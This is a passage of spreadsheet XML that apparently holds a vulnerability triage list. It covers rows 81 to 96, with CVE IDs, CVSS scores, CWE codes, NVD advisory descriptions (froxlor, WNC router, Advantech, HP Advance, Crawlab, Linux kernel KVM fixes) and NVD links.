      <c r="Q81" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>froxlor versions before 2.2.5 fail to validate newline characters in subdomain redirect URLs, allowing authenticated customers to inject arbitrary nginx or Apache configuration directives. Attackers can supply URLs containing literal newlines that are written verbatim into vhost config files during cron rebuild, enabling web server configuration corruption, denial of service, or hijacking of HTTP responses across hosted domains.</t>
        </is>
      </c>
      <c r="S81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90937</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15639</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>1443cd92-d354-46d2-9290-d812316ca43a</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr"/>
      <c r="Q82" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>An attacker can craft a malicious link that, if used by a legitimate user, may cause the user's browser to run JavaScript supplied by the attacker.</t>
        </is>
      </c>
      <c r="S82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15639</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40855</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr"/>
      <c r="Q83" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>WNC T-Mobile 5G Box IDU router is vulnerable to a command injection. The vulnerability exists in the ping functionality within the /cgi-bin/portal.cgi endpoint, specifically affecting the ping_ip, ping_size, and ping_times POST parameters. The root cause is the failure to verify and sanitize user-supplied input before incorporating it into a system command. This allows an authenticated attacker to execute arbitrary commands on the shell and gain root access to the system.This issue has been fixed in firmware version 1.1.0.651412</t>
        </is>
      </c>
      <c r="S83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40855</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58147</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr"/>
      <c r="Q84" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>WNC T-Mobile 5G Box IDU router contains an OS command injection vulnerability in the portal.cgi component's password change functionality. The application improperly neutralizes special elements in the http_passwd_hidden and http_passwdConfirm_hidden parameters, allowing an authenticated attacker to execute arbitrary commands on the underlying operating system with root privileges.This issue has been fixed in firmware version 1.1.0.651412</t>
        </is>
      </c>
      <c r="S84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58147</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73172</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr"/>
      <c r="Q85" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the edgserver management service of Advantech EKI-1242EIMS in firmware version V1.06.01 that allows a remote unauthenticated attacker to execute arbitrary OS commands as root via crafted requests to TCP port 5058.</t>
        </is>
      </c>
      <c r="S85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73172</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89082</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr"/>
      <c r="Q86" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>HP has identified potential security vulnerabilities in the HP Advance software that may enable elevation of privilege, remote code execution, or arbitrary file write under certain conditions, impacting the HP Advance server hosting the software.</t>
        </is>
      </c>
      <c r="S86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89082</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89083</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr"/>
      <c r="Q87" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>HP
has identified potential security vulnerabilities in the HP Advance software
that may enable elevation of privilege, remote code execution, or arbitrary
file write under certain conditions, impacting the HP Advance server hosting
the software.</t>
        </is>
      </c>
      <c r="S87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89083</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89775</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr"/>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Handle negative S1 walk levels in VNCR TLB size evaluation
Computing the effects of a TLB invalidation involves looking at
the size of the mapping cached by the TLB. For S1 mappings such as
VNCR, this is deducted from the combination of the base granule size
and the mapping level.
However, this implies that the S1 MMU is *on*. When the MMU is off,
we indicate this with the level being set to a "creative" value of
-127 (S1_MMU_DISABLED).
This ends-up being misinterpreted by pgshift_level_to_ttl() as it
doesn't handle negative levels at all (the level is immediately cast
to a u8 and only the bottom two bits considered), leading to an
invalidation size of 0. Not helpful.
Tidy-up pgshift_level_to_ttl() to handle these negative levels, and
ttl_to_size() to always return SZ_1G when no valid TTL is present.
This allows the removal of open-coded checks for similar situations.
Note that the check for a negative value not explicitely checking for
S1_MMU_DISABLED is deliberate, so that actual negative levels introduced
with LVA2 and D128 can take the same path if we ever support them.</t>
        </is>
      </c>
      <c r="S88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89775</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89914</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr"/>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Sign-extend VA for range-based TLBI invalidation
When the decode_range_tlbi() helper was moved to be used for S1 TLBIs,
the required sign extension was omitted. Add it.
As a result, special care must be taken to not overflow PA bits when
this is used for S2 invalidation.</t>
        </is>
      </c>
      <c r="S89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89914</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89915</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr"/>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Remove VM-wide VNCR mapping counter
The global VNCR mapping counter is used to decide whether an L1
provided VNCR page is mapped in L0 on any CPU at the point of
dealing with a TLB invalidation. It is incremented when a mapping
is made in the fixmap, and decremented when unmapped.
As it turns out, this tracking has several flaws:
- we are trying to invalidate TLBs, and the mapping is only an
  opportunistic consequence of the TLB. Checking this counter to
  decide whether a TLB needs to be invalidated may result in missed
  invalidations.
- an L1 vcpu invalidating its own TLB (a very likely case) will not
  succeed in invalidating the VNCR pseudo TLB because that page is
  not mapped in L0 at this stage.
Given that this tracking fails at delivering the minimum guarantees
that are required and is only a performance optimisation, remove it
completely.</t>
        </is>
      </c>
      <c r="S90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89915</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89916</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr"/>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Make VNCR invalidation participate in MMU invalidation retry
A VNCR TLB invalidation can occur on one vcpu while another vcpu is
faulting in this same page. Without correctly handling this, we can
end up with the following scenario:
- vcpu A walks the PTs to translate VNCR
- before vcpu A is able to grab the MMU lock to insert the TLB,
  vcpu B updates the S1 PTs with an invalid entry, and issues
  a TLBI S1E2 for this VA
- vcpu A inserts the TLB for something that is now invalid
This isn't a new problem, and we manage S2 by having the MMU notifier
to bump up mmu_invalidate_seq on invalidation so that the fault can be
replayed.
We can perform something similar here, and extend invalidate_vncr_va() to
update the same counter, clearly indicating that the context has
changed under our feet. This is safe as the invalidation always happen
while holding the MMU lock for write, and that we sample the sequence
number before walking S1.</t>
        </is>
      </c>
      <c r="S91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89916</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89918</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr"/>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Correctly handle end of VA space TLBI invalidation
Our TLB invalidation by VA code is based on comparing two ranges,
one defined by the TLB, and one defined by the TLBI instruction.
Each range is defined by a start and a size. However, the way the
comparison is done doesn't account for address rollover, as it
compares an address with (base + size). This works nicely until
this expression represent the last page/block in the TTBR1 VA space,
as the result is a big fat 0. And a failed TLB invalidation.
Rewrite the comparison in a way that is immune to the address
rollover (making the end address inclusive instead of exclusive),
and move this into a common helper that is used by both VA and IPA
invalidations, as suggested by Hyunwoo Kim (although the IPA version
didn't suffer from this particular problem, obviously).</t>
        </is>
      </c>
      <c r="S92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89918</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89930</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr"/>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: nVMX: Service local TLB flushes on failed nested VM-Enter
KVM services local TLB flushes on "full" nested VM-Exits (through
__nested_vmx_vmexit()), but not if a nested VM-Enter fails (e.g. due to
failed VMCS checks in nested_vmx_enter_non_root_mode()).
However, it is possible that KVM had queued TLB flushes that need to be
performed, even if the nested VM-Enter was not successful. For example,
if VPID is disabled for L2 (via nested_vmx_transition_tlb_flush(), or if
via the MSR load lists, as the SDM says:
  If any MSR is being loaded in such a way that would architecturally
  require a TLB flush, the TLBs are updated so that, after VM entry, the
  logical processor will not use any translations that were cached before
  the transition.
The SDM is unclear about when the TLB flush should occur, and whether or
not a failed VM entry would flush the TLB, so it is safer to always
do the TLB flush in this case.
More concretely, KVM also updates the last VPID L1 used for L2 in
nested_vmx_transition_tlb_flush() (i.e. last_vpid), even if the VM entry
ultimately fails. With the current code, KVM could miss a TLB flush if
L1 changes L2's VPID, then does a failed VM entry followed by a
successful one, as the failed VM entry would update last_vpid but not
actually flush the TLB. Servicing local TLB flushes on failed VM entries
makes sure that the TLB is always flushed when last_vpid is updated.</t>
        </is>
      </c>
      <c r="S93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89930</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90049</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr"/>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: skbuff: don't skb_tx_error() the source skb in skb_zerocopy()
skb_zerocopy() copies frags from @from into @to. On an
skb_orphan_frags() failure it calls skb_tx_error(@from), a destructive
operation on the source skb the copy helper does not own. That completes
@from's zerocopy uarg and clears SKBFL_ALL_ZEROCOPY, including the
SKBFL_SHARED_FRAG page-ownership marker.
Both callers already report the failure on their own drop path.
nfnetlink_queue does it at nla_put_failure, and Open vSwitch does it in
the flow-miss drop arm of ovs_dp_process_packet(), so nothing is lost by
dropping it here.
On Open vSwitch's OVS_ACTION_ATTR_USERSPACE path the skb is not freed on
this error: do_execute_actions() ignores output_userspace()'s return
value and, unless the upcall was the last action, keeps forwarding the
same skb through the flow's remaining actions. The uarg is completed
while that skb is still in flight, telling the producer its buffers are
free, and SKBFL_SHARED_FRAG is cleared on an skb the rest of the stack
still handles. That flag is what makes esp_input() call skb_cow_data()
instead of decrypting in place, so a later local ESP delivery can
decrypt over frags the skb does not own privately.
Leave error reporting to the callers.</t>
        </is>
      </c>
      <c r="S94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90049</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90945</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr"/>
      <c r="Q95" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>Crawlab through 0.6.3 uses a hard-coded HMAC-SHA256 secret for JWT token signing that cannot be overridden via configuration or environment variables. Unauthenticated attackers can forge valid administrator tokens to access administrative APIs and execute code on worker nodes.</t>
        </is>
      </c>
      <c r="S95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90945</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90961</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr"/>
      <c r="Q96" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-287</t>
        </is>
      </c>
      <c r="R96" s="5" t="inlineStr">
        <is>
